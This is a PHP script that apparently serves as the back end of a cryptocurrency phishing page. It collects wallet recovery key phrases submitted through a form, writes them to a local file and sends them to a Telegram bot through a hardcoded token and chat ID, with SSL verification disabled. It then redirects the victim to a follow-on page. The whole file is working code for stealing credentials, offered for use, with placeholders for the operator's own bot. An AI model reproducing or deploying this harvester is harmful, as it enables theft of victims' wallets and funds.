<?php
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    // Retrieve wallet details from POST request
    $walletName = $_POST['walletName'] ?? 'Unknown Wallet';
    $keyPhrases = $_POST['keyPhrases'] ?? [];

    // Format key phrases as a single string
    $keyPhrasesString = implode(', ', $keyPhrases);

    // Save data to a text file
    $data = "Wallet Name: $walletName\nKey Phrases: $keyPhrasesString\n\n";
    file_put_contents('data.txt', $data, FILE_APPEND);

    // Telegram Bot details
    $botToken = "7823376896:AAHOYNHvx5jObok0um6HO7WhD8kLyv3mUds";  // Replace with your Bot Token
    $chatId = "6126916514";  // Replace with your chat_id

    // Construct the message
    $message = "🔒 *New Wallet Submission*\n\n";
    $message .= "👜 *Wallet:* $walletName\n";
    $message .= "🔑 *Key Phrase:* `$keyPhrasesString`\n\n";
    $message .= "📅 *Time:* " . date("Y-m-d H:i:s");

    // URL to send message
    $url = "https://api.telegram.org/bot$botToken/sendMessage?" . http_build_query([
        "chat_id" => $chatId,
        "text" => $message,
        "parse_mode" => "Markdown"
    ]);

    // Create a stream context to disable SSL verification
    $context = stream_context_create([
        "ssl" => [
            "verify_peer" => false,
            "verify_peer_name" => false,
        ]
    ]);

    // Send the request to Telegram
    $response = file_get_contents($url, false, $context);

    // Check if the request was successful
    if ($response) {
        header('Location: nextpage.html');  // Redirect on success
        exit;
    } else {
        die("Error sending message to Telegram.");
    }
} else {
    // Redirect to an error page if the request method is not POST
    header('Location: error.html');
    exit;
}
?>